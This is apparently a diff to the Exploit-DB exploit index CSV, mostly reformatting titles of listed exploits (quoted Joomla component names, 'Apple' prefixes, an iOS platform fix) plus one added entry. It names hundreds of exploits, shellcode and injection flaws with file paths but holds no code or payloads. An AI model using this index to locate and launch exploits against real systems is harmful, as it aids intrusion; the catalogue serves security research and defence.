@@ -30639,7 +30639,7 @@ id,file,description,date,author,platform,type,port
 33900,platforms/windows/remote/33900.pl,"Serenity Audio Player 3.2.3 - '.m3u' Buffer Overflow",2010-04-26,Madjix,windows,remote,0
 33901,platforms/windows/remote/33901.rb,"Serenity Audio Player 3.2.3 - '.m3u' Buffer Overflow (Metasploit)",2010-04-26,blake,windows,remote,0
 34102,platforms/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",linux,dos,80
-33904,platforms/linux/local/33904.txt,"check_dhcp 2.0.2 (Nagios Plugins) - Arbitrary Option File Read Race Condition",2014-06-28,"Dawid Golunski",linux,local,0
+33904,platforms/linux/local/33904.txt,"Nagios Plugins check_dhcp 2.0.2 - Arbitrary Option File Read Race Condition",2014-06-28,"Dawid Golunski",linux,local,0
 33905,platforms/multiple/remote/33905.txt,"Apache ActiveMQ 5.3 - 'admin/queueBrowse' Cross-Site Scripting",2010-04-28,"arun kethipelly",multiple,remote,0
 33906,platforms/php/webapps/33906.txt,"velBox 1.2 - Insecure Cookie Authentication Bypass",2010-04-28,indoushka,php,webapps,0
 33907,platforms/multiple/remote/33907.txt,"ZKSoftware 'ZK5000' - Remote Information Disclosure",2010-03-20,fb1h2s,multiple,remote,0
@@ -31627,7 +31627,7 @@ id,file,description,date,author,platform,type,port
 35006,platforms/windows/remote/35006.html,"WebKit - Insufficient Entropy Random Number Generator Weakness (2)",2010-11-18,"Amit Klein",windows,remote,0
 35007,platforms/windows/remote/35007.c,"Native Instruments Multiple Products - DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",windows,remote,0
 35008,platforms/cgi/webapps/35008.txt,"Hot Links SQL 3.2 - 'report.cgi' SQL Injection",2010-11-22,"Aliaksandr Hartsuyeu",cgi,webapps,0
-35010,platforms/osx/local/35010.c,"Apple iOS 4.0.2 - Networking Packet Filter Rules Privilege Escalation",2010-11-22,Apple,osx,local,0
+35010,platforms/ios/local/35010.c,"Apple iOS 4.0.2 - Networking Packet Filter Rules Privilege Escalation",2010-11-22,Apple,ios,local,0
 35011,platforms/linux/remote/35011.txt,"Apache Tomcat 7.0.4 - 'sort' and 'orderBy' Parameters Cross-Site Scripting",2010-11-22,"Adam Muntner",linux,remote,0
 35012,platforms/multiple/webapps/35012.txt,"ZYXEL P-660R-T1 V2 - 'HomeCurrent_Date' Parameter Cross-Site Scripting",2010-11-23,"Usman Saeed",multiple,webapps,0
 35014,platforms/hardware/remote/35014.txt,"D-Link DIR-300 - WiFi Key Security Bypass",2010-11-24,"Gaurav Saha",hardware,remote,0
@@ -33829,8 +33829,8 @@ id,file,description,date,author,platform,type,port
 37378,platforms/php/webapps/37378.php,"Joomla! Component Simple SWFupload - 'uploadhandler.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
 37379,platforms/php/webapps/37379.php,"Joomla! Component Art Uploader - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
 37380,platforms/php/webapps/37380.php,"Joomla! Component DentroVideo - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
-37381,platforms/php/webapps/37381.html,"Joomla! Component IDoEditor - 'image.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0
-37382,platforms/php/webapps/37382.php,"Joomla! Component jFancy - 'script.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0
+37381,platforms/php/webapps/37381.html,"Joomla! Component 'IDoEditor' - 'image.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0
+37382,platforms/php/webapps/37382.php,"Joomla! Component 'mod_jfancy' - 'script.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0
 37383,platforms/php/webapps/37383.php,"Joomla! Component Easy Flash Uploader - 'helper.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
 37384,platforms/lin_x86/shellcode/37384.c,"Linux/x86 - execve /bin/sh Shellcode (23 bytes)",2015-06-26,"Bill Borskey",lin_x86,shellcode,0
 37386,platforms/osx/dos/37386.php,"Apple Mac OSX 10.10.3 (Yosemite) Safari 8.0.x - Crash (PoC)",2015-06-26,"Mohammad Reza Espargham",osx,dos,0
@@ -33857,10 +33857,10 @@ id,file,description,date,author,platform,type,port
 37407,platforms/php/webapps/37407.txt,"ADICO - 'index.php' Script SQL Injection",2012-06-15,"Ibrahim El-Sayed",php,webapps,0
 37408,platforms/php/webapps/37408.txt,"Simple Forum PHP - Multiple SQL Injections",2012-06-14,"Vulnerability Research Laboratory",php,webapps,0
 37409,platforms/php/webapps/37409.txt,"NetArt Media Jobs Portal - SQL Injection",2012-06-14,"Ibrahim El-Sayed",php,webapps,0
-37410,platforms/php/webapps/37410.php,"Joomla! Component hwdVideoShare - 'flash_upload.php' Arbitrary File Upload",2012-06-17,"Sammy FORGIT",php,webapps,0
+37410,platforms/php/webapps/37410.php,"Joomla! Component 'com_hwdvideoshare' - 'flash_upload.php' Arbitrary File Upload",2012-06-17,"Sammy FORGIT",php,webapps,0
 37411,platforms/php/webapps/37411.txt,"WordPress Plugin ORGanizer - Multiple Security Vulnerabilities",2012-06-15,MustLive,php,webapps,0
-37412,platforms/php/webapps/37412.php,"Joomla! Component Maian Media - 'uploadhandler.php' Arbitrary File Upload",2012-06-16,"Sammy FORGIT",php,webapps,0
-37413,platforms/php/webapps/37413.txt,"Joomla! Component JCal Pro Calendar - SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0
+37412,platforms/php/webapps/37412.php,"Joomla! Component 'com_maianmedia' - 'uploadhandler.php' Arbitrary File Upload",2012-06-16,"Sammy FORGIT",php,webapps,0
+37413,platforms/php/webapps/37413.txt,"Joomla! Component 'com_jcalpro' - SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0
 37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 - Multiple SQL Injections",2012-06-16,JosS,php,webapps,0
 37415,platforms/php/webapps/37415.txt,"Webify Multiple Products - Multiple HTML Injection / Local File Inclusion",2012-06-16,snup,php,webapps,0
 37416,platforms/java/webapps/37416.txt,"Squiz CMS - Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0
@@ -33890,7 +33890,7 @@ id,file,description,date,author,platform,type,port
 37439,platforms/php/webapps/37439.txt,"Novius 5.0.1 - Multiple Vulnerabilities",2015-06-30,hyp3rlinx,php,webapps,80
 37441,platforms/jsp/webapps/37441.txt,"WedgeOS 4.0.4 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,jsp,webapps,0
 37442,platforms/linux/webapps/37442.txt,"CollabNet Subversion Edge Management 4.0.11 - Local File Inclusion",2015-06-30,otr,linux,webapps,4434
-37443,platforms/php/webapps/37443.txt,"Joomla! Component com_szallasok - 'id' Parameter SQL Injection",2012-06-21,CoBRa_21,php,webapps,0
+37443,platforms/php/webapps/37443.txt,"Joomla! Component 'com_szallasok' - 'id' Parameter SQL Injection",2012-06-21,CoBRa_21,php,webapps,0
 37444,platforms/php/webapps/37444.txt,"Cotonti - 'admin.php' SQL Injection",2012-06-22,AkaStep,php,webapps,0
 37445,platforms/php/webapps/37445.txt,"CMS Lokomedia - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-06-22,the_cyber_nuxbie,php,webapps,0
 37446,platforms/php/webapps/37446.txt,"Fiyo CMS 2.0_1.9.1 - SQL Injection",2015-06-30,cfreer,php,webapps,80
@@ -33919,7 +33919,7 @@ id,file,description,date,author,platform,type,port
 37470,platforms/multiple/webapps/37470.txt,"SWFupload - 'movieName' Parameter Cross-Site Scripting",2012-06-29,"Nathan Partlan",multiple,webapps,0
 37471,platforms/windows/dos/37471.pl,"Zoom Player - '.avi' File Divide-by-Zero Denial of Service",2012-07-02,Dark-Puzzle,windows,dos,0
 37472,platforms/php/webapps/37472.php,"Getsimple CMS Items Manager Plugin - 'PHP.php' Arbitrary File Upload",2012-07-02,"Sammy FORGIT",php,webapps,0
-37473,platforms/php/webapps/37473.txt,"Joomla! Module Language Switcher 2.5.x - Multiple Cross-Site Scripting Vulnerabilities",2012-07-02,"Stefan Schurtz",php,webapps,0
+40676,platforms/php/webapps/40676.txt,"My Little Forum 2.3.7 - Multiple Vulnerabilities",2016-11-01,"Ashiyane Digital Security Team",php,webapps,0
 37474,platforms/php/webapps/37474.txt,"CuteNews 2.0.3 - Arbitrary File Upload",2015-07-03,T0x!c,php,webapps,80
 37498,platforms/php/webapps/37498.txt,"Kajona - 'getAllPassedParams()' Function Multiple Cross-Site Scripting Vulnerabilities",2012-07-11,"High-Tech Bridge SA",php,webapps,0
 37476,platforms/php/webapps/37476.txt,"PHP MBB - Cross-Site Scripting / SQL Injection",2012-07-03,TheCyberNuxbie,php,webapps,0
@@ -33962,7 +33962,7 @@ id,file,description,date,author,platform,type,port
 37516,platforms/hardware/webapps/37516.txt,"D-Link DSL-2750u / DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",hardware,webapps,0
 37517,platforms/hardware/dos/37517.pl,"INFOMARK IMW-C920W MiniUPnPd 1.0 - Denial of Service",2015-07-07,"Todor Donev",hardware,dos,1900
 37518,platforms/multiple/dos/37518.html,"Arora Browser - Remote Denial of Service",2012-07-18,t3rm!n4t0r,multiple,dos,0
-37519,platforms/php/webapps/37519.txt,"Joomla! Component com_hello - 'Controller' Parameter Local File Inclusion",2012-07-19,"AJAX Security Team",php,webapps,0
+37519,platforms/php/webapps/37519.txt,"Joomla! Component 'com_hello' - 'Controller' Parameter Local File Inclusion",2012-07-19,"AJAX Security Team",php,webapps,0
 37520,platforms/php/webapps/37520.txt,"Maian Survey - 'index.php' URI redirection / Local File Inclusion",2012-07-20,PuN!Sh3r,php,webapps,0
 37521,platforms/php/webapps/37521.txt,"CodeIgniter 2.1 - 'xss_clean()' Filter Security Bypass",2012-07-19,"Krzysztof Kotowicz",php,webapps,0
 37522,platforms/php/webapps/37522.txt,"WordPress Plugin chenpress - Arbitrary File Upload",2012-07-21,Am!r,php,webapps,0
@@ -33981,7 +33981,7 @@ id,file,description,date,author,platform,type,port
 37537,platforms/php/webapps/37537.txt,"phpProfiles - Multiple Security Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0
 37538,platforms/linux/dos/37538.py,"ISC DHCP 4.x - Multiple Denial of Service Vulnerabilities",2012-07-25,"Markus Hietava",linux,dos,0
 37539,platforms/php/webapps/37539.txt,"REDAXO - 'subpage' Parameter Cross-Site Scripting",2012-07-25,"High-Tech Bridge SA",php,webapps,0
-37540,platforms/php/webapps/37540.txt,"Joomla! Component Odudeprofile - 'profession' Parameter SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0
+37540,platforms/php/webapps/37540.txt,"Joomla! Component 'com_odudeprofile' - 'profession' Parameter SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0
 37541,platforms/php/webapps/37541.txt,"tekno.Portal 0.1b - 'anket.php' SQL Injection",2012-07-25,Socket_0x03,php,webapps,0
 37542,platforms/windows/remote/37542.html,"Barcodewiz 'Barcodewiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow",2012-07-25,coolkaveh,windows,remote,0
 37543,platforms/linux/local/37543.c,"Linux Kernel 2.6.x - 'rds_recvmsg()' Function Local Information Disclosure",2012-07-26,"Jay Fenlason",linux,local,0
@@ -34008,7 +34008,7 @@ id,file,description,date,author,platform,type,port
 37571,platforms/multiple/webapps/37571.txt,"Zenoss 3.2.1 - Multiple Security Vulnerabilities",2012-07-30,"Brendan Coles",multiple,webapps,0
 37572,platforms/php/webapps/37572.txt,"Elefant CMS - 'id' Parameter Cross-Site Scripting",2012-08-03,PuN!Sh3r,php,webapps,0
 37573,platforms/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",multiple,webapps,0
-37575,platforms/php/webapps/37575.txt,"Joomla! Component com_photo - Multiple SQL Injections",2012-08-06,"Chokri Ben Achor",php,webapps,0
+37575,platforms/php/webapps/37575.txt,"Joomla! Component 'com_photo' - Multiple SQL Injections",2012-08-06,"Chokri Ben Achor",php,webapps,0
 37576,platforms/linux/remote/37576.cpp,"Alligra Calligra - Heap Based Buffer Overflow",2012-08-07,"Charlie Miller",linux,remote,0
 37577,platforms/asp/webapps/37577.txt,"PolarisCMS - 'WebForm_OnSubmit()' Function Cross-Site Scripting",2012-08-05,"Gjoko Krstic",asp,webapps,0
 37578,platforms/php/webapps/37578.txt,"Open Constructor - users/users.php keyword Parameter Cross-Site Scripting",2012-08-04,"Lorenzo Cantoni",php,webapps,0
@@ -34076,7 +34076,7 @@ id,file,description,date,author,platform,type,port
 37645,platforms/php/webapps/37645.txt,"OrderSys 1.6.4 - Multiple SQL Injections / Multiple Cross-Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps,0
 37646,platforms/php/webapps/37646.txt,"Banana Dance - Cross-Site Scripting / SQL Injection",2012-08-22,"Canberk BOLAT",php,webapps,0
 37647,platforms/multiple/remote/37647.txt,"Apache Struts2 - Skill Name Remote Code Execution",2012-08-23,kxlzx,multiple,remote,0
-37648,platforms/php/webapps/37648.txt,"Joomla! Component CiviCRM - Multiple Arbitrary File Upload Vulnerabilities",2012-08-22,Crim3R,php,webapps,0
+37648,platforms/php/webapps/37648.txt,"Joomla! Component 'com_civicrm' - Multiple Arbitrary File Upload Vulnerabilities",2012-08-22,Crim3R,php,webapps,0
 37649,platforms/php/webapps/37649.html,"SiNG cms - 'Password.php' Cross-Site Scripting",2012-08-23,LiquidWorm,php,webapps,0
 37650,platforms/php/webapps/37650.txt,"1024 CMS 2.1.1 - 'p' Parameter SQL Injection",2012-08-22,kallimero,php,webapps,0
 37651,platforms/php/webapps/37651.html,"Monstra - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,php,webapps,0
@@ -34100,7 +34100,7 @@ id,file,description,date,author,platform,type,port
 37672,platforms/php/webapps/37672.txt,"JW Player - 'logo.link' Parameter Cross-Site Scripting",2012-08-29,MustLive,php,webapps,0
 37673,platforms/windows/dos/37673.html,"Microsoft Indexing Service - 'ixsso.dll' ActiveX Control Denial of Service",2012-08-24,coolkaveh,windows,dos,0
 37674,platforms/php/webapps/37674.txt,"PHP Web Scripts Text Exchange Pro - 'page' Parameter Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0
-37675,platforms/php/webapps/37675.txt,"Joomla! Component Komento - 'cid' Parameter SQL Injection",2012-08-27,Crim3R,php,webapps,0
+37675,platforms/php/webapps/37675.txt,"Joomla! Component 'Komento' - 'cid' Parameter SQL Injection",2012-08-27,Crim3R,php,webapps,0
 37676,platforms/asp/webapps/37676.txt,"Power-eCommerce - Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0
 37677,platforms/php/webapps/37677.txt,"WordPress Plugin Finder - 'order' Parameter Cross-Site Scripting",2012-08-25,Crim3R,php,webapps,0
 37678,platforms/asp/webapps/37678.txt,"Web Wiz Forums - Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0
@@ -34402,7 +34402,7 @@ id,file,description,date,author,platform,type,port
 37990,platforms/multiple/dos/37990.txt,"QEMU - Programmable Interrupt Timer Controller Heap Overflow",2015-08-27,"Google Security Research",multiple,dos,0
 37991,platforms/php/webapps/37991.txt,"WANem - Multiple Cross-Site Scripting Vulnerabilities",2012-10-16,"Brendan Coles",php,webapps,0
 37992,platforms/php/webapps/37992.txt,"CorePlayer - 'callback' Parameter Cross-Site Scripting",2012-10-28,MustLive,php,webapps,0
-37993,platforms/php/webapps/37993.txt,"Joomla! Component com_quiz - SQL Injection",2012-10-30,"Daniel Barragan",php,webapps,0
+37993,platforms/php/webapps/37993.txt,"Joomla! Component 'com_quiz' - SQL Injection",2012-10-30,"Daniel Barragan",php,webapps,0
 37994,platforms/php/webapps/37994.txt,"NetCat CMS - Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps,0
 37995,platforms/asp/webapps/37995.txt,"SolarWinds Orion IP Address Manager - (IPAM) 'search.aspx' Cross-Site Scripting",2012-10-31,"Anthony Trummer",asp,webapps,0
 37996,platforms/windows/remote/37996.txt,"Axigen Mail Server - 'Filename' Parameter Directory Traversal",2012-10-31,"Zhao Liang",windows,remote,0
@@ -34416,7 +34416,7 @@ id,file,description,date,author,platform,type,port
 38005,platforms/windows/remote/38005.asp,"MS SQL Server 2000/2005 - SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit",2015-08-29,ylbhz,windows,remote,0
 38006,platforms/php/webapps/38006.txt,"BloofoxCMS 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps,0
 38007,platforms/php/webapps/38007.txt,"DCForum - auth_user_file.txt File Multiple Information Disclosure Vulnerabilities",2012-11-02,r45c4l,php,webapps,0
-38008,platforms/php/webapps/38008.txt,"Joomla! Component com_parcoauto - 'idVeicolo' Parameter SQL Injection",2012-11-03,"Andrea Bocchetti",php,webapps,0
+38008,platforms/php/webapps/38008.txt,"Joomla! Component 'com_parcoauto' - 'idVeicolo' Parameter SQL Injection",2012-11-03,"Andrea Bocchetti",php,webapps,0
 38009,platforms/php/webapps/38009.txt,"AWAuctionScript CMS - Multiple Remote Vulnerabilities",2012-11-04,X-Cisadane,php,webapps,0
 38010,platforms/php/webapps/38010.txt,"VeriCentre - Multiple SQL Injections",2012-11-06,"Cory Eubanks",php,webapps,0
 38011,platforms/php/webapps/38011.txt,"OrangeHRM - 'sortField' Parameter SQL Injection",2012-11-07,"High-Tech Bridge",php,webapps,0
@@ -34529,8 +34529,8 @@ id,file,description,date,author,platform,type,port
 38131,platforms/php/webapps/38131.txt,"PHP Address Book - 'group' Parameter Cross-Site Scripting",2012-12-13,"Kenneth F. Belva",php,webapps,0
 38132,platforms/linux/dos/38132.py,"Linux Kernel 3.3.5 - Btrfs CRC32C feature Infinite Loop Local Denial of Service",2012-12-13,"Pascal Junod",linux,dos,0
 38133,platforms/php/webapps/38133.txt,"WordPress Plugin RokBox Plugin - /wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext Parameter Cross-Site Scripting",2012-12-17,MustLive,php,webapps,0
-38134,platforms/php/webapps/38134.txt,"Joomla! Component ZT Autolinks - 'Controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0
-38135,platforms/php/webapps/38135.txt,"Joomla! Component Bit - 'Controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0
+38134,platforms/php/webapps/38134.txt,"Joomla! Component 'com_ztautolink' - 'Controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0
+38135,platforms/php/webapps/38135.txt,"Joomla! Component 'com_bit' - 'Controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0
 38138,platforms/osx/local/38138.txt,"Apple Mac OSX - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
 38139,platforms/php/webapps/38139.txt,"MyBB Transactions Plugin - 'transaction' Parameter SQL Injection",2012-12-18,limb0,php,webapps,0
 38140,platforms/php/webapps/38140.php,"VoipNow Service Provider Edition - Arbitrary Command Execution",2012-12-21,i-Hmx,php,webapps,0
@@ -34565,7 +34565,7 @@ id,file,description,date,author,platform,type,port
 38168,platforms/php/webapps/38168.txt,"TomatoCart - 'json.php' Security Bypass",2013-01-04,"Aung Khant",php,webapps,0
 38169,platforms/php/webapps/38169.txt,"Havalite CMS - 'comment' Parameter HTML Injection",2013-01-06,"Henri Salo",php,webapps,0
 38170,platforms/android/remote/38170.txt,"Facebook for Android - 'LoginActivity' Information Disclosure",2013-01-07,"Takeshi Terada",android,remote,0
-38171,platforms/php/webapps/38171.txt,"Joomla! Component Incapsula - Multiple Cross-Site Scripting Vulnerabilities",2013-01-08,"Gjoko Krstic",php,webapps,0
+38171,platforms/php/webapps/38171.txt,"Joomla! Component 'com_incapsula' - Multiple Cross-Site Scripting Vulnerabilities",2013-01-08,"Gjoko Krstic",php,webapps,0
 38178,platforms/php/webapps/38178.txt,"WordPress Plugin NextGEN Gallery - 'test-head' Parameter Cross-Site Scripting",2013-01-08,Am!r,php,webapps,0
 38173,platforms/multiple/webapps/38173.txt,"ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Query Execution",2015-09-14,xistence,multiple,webapps,0
 38174,platforms/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,multiple,webapps,0
@@ -34754,7 +34754,7 @@ id,file,description,date,author,platform,type,port
 38368,platforms/multiple/remote/38368.txt,"McAfee Vulnerability Manager - 'cert_cn' Parameter Cross-Site Scripting",2013-03-08,"Asheesh Anaconda",multiple,remote,0
 38369,platforms/hardware/webapps/38369.txt,"Bosch Security Systems Dinion NBN-498 - Web Interface XML Injection",2015-10-01,neom22,hardware,webapps,0
 38370,platforms/hardware/remote/38370.txt,"PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities",2015-10-01,"Karn Ganeshen",hardware,remote,0
-38371,platforms/osx/local/38371.py,"Apple Mac OSX 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-01,rebel,osx,local,0
+38371,platforms/osx/local/38371.py,"Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-01,rebel,osx,local,0
 38372,platforms/php/webapps/38372.html,"Question2Answer - Cross-Site Request Forgery",2013-03-01,MustLive,php,webapps,0
 38373,platforms/php/webapps/38373.txt,"WordPress Plugin Terillion Reviews - Profile Id HTML Injection",2013-03-08,"Aditya Balapure",php,webapps,0
 38374,platforms/php/webapps/38374.txt,"SWFupload - Multiple Content Spoofing / Cross-Site Scripting Vulnerabilities",2013-03-10,MustLive,php,webapps,0
@@ -34912,7 +34912,7 @@ id,file,description,date,author,platform,type,port
 38538,platforms/multiple/dos/38538.py,"Code::Blocks - Denial of Service",2013-05-29,ariarat,multiple,dos,0
 38644,platforms/windows/remote/38644.txt,"SolarWinds Log and Event Manager/Trigeo SIM 6.1.0 - Remote Command Execution",2015-11-06,"Chris Graham",windows,remote,0
 38645,platforms/jsp/webapps/38645.txt,"NXFilter 3.0.3 - Cross-Site Request Forgery",2015-11-06,hyp3rlinx,jsp,webapps,0
-38540,platforms/osx/local/38540.rb,"Apple Mac OSX 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0
+38540,platforms/osx/local/38540.rb,"Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0
 38541,platforms/php/remote/38541.rb,"Th3 MMA - mma.php Backdoor Arbitrary File Upload (Metasploit)",2015-10-27,Metasploit,php,remote,80
 38543,platforms/php/webapps/38543.txt,"PHP4dvd - 'config.php' PHP Code Injection",2012-05-31,"CWH Underground",php,webapps,0
 38544,platforms/php/webapps/38544.txt,"Elastix - Multiple Cross-Site Scripting Vulnerabilities",2013-05-28,cheki,php,webapps,0
@@ -34961,7 +34961,7 @@ id,file,description,date,author,platform,type,port
 38589,platforms/linux/dos/38589.c,"Linux Kernel 3.0.5 - 'test_root()' Function Local Denial of Service",2013-06-05,"Jonathan Salwan",linux,dos,0
 38590,platforms/php/webapps/38590.txt,"et-chat - Privilege Escalation / Arbitrary File Upload",2013-06-18,MR.XpR,php,webapps,0
 38591,platforms/hardware/remote/38591.py,"TP-Link TL-PS110U Print Server - 'tplink-enum.py' Security Bypass",2013-06-19,SANTHO,hardware,remote,0
-38592,platforms/php/webapps/38592.php,"Joomla! Component RokDownloads - Arbitrary File Upload",2013-06-19,Am!r,php,webapps,0
+38592,platforms/php/webapps/38592.php,"Joomla! Component 'com_rokdownloads' - Arbitrary File Upload",2013-06-19,Am!r,php,webapps,0
 38593,platforms/cgi/webapps/38593.txt,"FtpLocate - HTML Injection",2013-06-24,Chako,cgi,webapps,0
 38594,platforms/php/webapps/38594.txt,"Barnraiser Prairie - 'get_file.php' Directory Traversal",2013-06-25,prairie,php,webapps,0
 38595,platforms/multiple/dos/38595.txt,"Oracle VM VirtualBox 4.0 - 'tracepath' Local Denial of Service",2013-06-26,"Thomas Dreibholz",multiple,dos,0
@@ -35985,7 +35985,7 @@ id,file,description,date,author,platform,type,port
 39672,platforms/hardware/webapps/39672.txt,"PLANET Technology IP Surveillance Cameras - Multiple Vulnerabilities",2016-04-07,Orwelllabs,hardware,webapps,443
 39673,platforms/linux/local/39673.py,"Mess Emulator 0.154-3.1 - Local Buffer Overflow",2016-04-07,"Juan Sacco",linux,local,0
 39674,platforms/windows/local/39674.py,"Express Zip 2.40 - Directory Traversal",2016-04-08,R-73eN,windows,local,0
-39675,platforms/osx/local/39675.c,"Apple Intel HD 3000 Graphics driver 10.0.0 - Privilege Escalation",2016-04-08,"Piotr Bania",osx,local,0
+39675,platforms/osx/local/39675.c,"Apple Intel HD 3000 Graphics Driver 10.0.0 - Privilege Escalation",2016-04-08,"Piotr Bania",osx,local,0
 39676,platforms/php/webapps/39676.txt,"op5 7.1.9 - Remote Command Execution",2016-04-08,hyp3rlinx,php,webapps,443
 39677,platforms/hardware/webapps/39677.html,"Hikvision Digital Video Recorder - Cross-Site Request Forgery",2016-04-11,LiquidWorm,hardware,webapps,80
 39678,platforms/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,php,webapps,80
@@ -36316,7 +36316,7 @@ id,file,description,date,author,platform,type,port
 40018,platforms/windows/local/40018.py,"VUPlayer 2.49 - '.m3u' Buffer Overflow (Win 7 DEP Bypass)",2016-06-27,secfigo,windows,local,0
 40019,platforms/php/webapps/40019.txt,"Kagao 3.0 - Multiple Vulnerabilities",2016-06-27,N4TuraL,php,webapps,80
 40020,platforms/windows/local/40020.txt,"Panda Security Multiple Products - Privilege Escalation",2016-06-27,Security-Assessment.com,windows,local,0
-40021,platforms/php/webapps/40021.php,"MyLittleForum 2.3.5 - PHP Command Injection",2016-06-27,hyp3rlinx,php,webapps,80
+40021,platforms/php/webapps/40021.php,"My Little Forum 2.3.5 - PHP Command Injection",2016-06-27,hyp3rlinx,php,webapps,80
 40022,platforms/php/webapps/40022.txt,"iBilling 3.7.0 - Persistent Cross-Site Scripting / Reflected Cross-Site Scripting",2016-06-27,"Bikramaditya Guha",php,webapps,80
 40023,platforms/linux/local/40023.py,"PInfo 0.6.9-5.1 - Local Buffer Overflow",2016-06-27,"Juan Sacco",linux,local,0
 40024,platforms/php/webapps/40024.txt,"BigTree CMS 4.2.11 - SQL Injection",2016-06-27,"Mehmet Ince",php,webapps,80
@@ -36745,9 +36745,9 @@ id,file,description,date,author,platform,type,port
 40649,platforms/windows/dos/40649.html,"Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow",2016-10-31,"Umit Aksu",windows,dos,0
 40650,platforms/php/webapps/40650.txt,"S9Y Serendipity 2.0.4 - Cross-Site Scripting",2016-10-31,Besim,php,webapps,0
 40651,platforms/windows/remote/40651.py,"Rumba FTP Client 4.x - Stack buffer overflow (SEH)",2016-10-31,"Umit Aksu",windows,remote,0
-40652,platforms/osx/dos/40652.c,"Apple OS X Kernel - IOBluetoothFamily.kext Use-After-Free",2016-10-31,"Google Security Research",osx,dos,0
-40653,platforms/osx/local/40653.txt,"OS X/iOS Kernel - IOSurface Use-After-Free",2016-10-31,"Google Security Research",osx,local,0
-40654,platforms/multiple/dos/40654.txt,"OS X/iOS - mach_ports_register Multiple Memory Safety Issues",2016-10-31,"Google Security Research",multiple,dos,0
+40652,platforms/osx/dos/40652.c,"Apple OS X - Kernel IOBluetoothFamily.kext Use-After-Free",2016-10-31,"Google Security Research",osx,dos,0
+40653,platforms/osx/local/40653.txt,"Apple OS X/iOS - Kernel IOSurface Use-After-Free",2016-10-31,"Google Security Research",osx,local,0
+40654,platforms/multiple/dos/40654.txt,"Apple OS X/iOS - mach_ports_register Multiple Memory Safety Issues",2016-10-31,"Google Security Research",multiple,dos,0
 40655,platforms/windows/local/40655.txt,"NVIDIA Driver - UVMLiteController ioctl Handling Unchecked Input/Output Lengths Privilege Escalation",2016-10-31,"Google Security Research",windows,local,0
 40656,platforms/windows/dos/40656.txt,"NVIDIA Driver - Escape Code Leaks Uninitialised ExAllocatePoolWithTag Memory to Userspace",2016-10-31,"Google Security Research",windows,dos,0
 40657,platforms/windows/dos/40657.txt,"NVIDIA Driver - Unchecked Write to User-Provided Pointer in Escape 0x700010d",2016-10-31,"Google Security Research",windows,dos,0
@@ -36762,5 +36762,13 @@ id,file,description,date,author,platform,type,port
 40666,platforms/windows/dos/40666.txt,"NVIDIA Driver - Missing Bounds Check in Escape 0x70000d5",2016-10-31,"Google Security Research",windows,dos,0
 40667,platforms/windows/dos/40667.txt,"NVIDIA Driver - Stack Buffer Overflow in Escape 0x7000014",2016-10-31,"Google Security Research",windows,dos,0
 40668,platforms/windows/dos/40668.txt,"NVIDIA Driver - Stack Buffer Overflow in Escape 0x10000e9",2016-10-31,"Google Security Research",windows,dos,0
-40669,platforms/osx/local/40669.txt,"MacOS 10.12 - 'task_t' Privilege Escalation",2016-10-31,"Google Security Research",osx,local,0
+40669,platforms/osx/local/40669.txt,"Apple MacOS 10.12 - 'task_t' Privilege Escalation",2016-10-31,"Google Security Research",osx,local,0
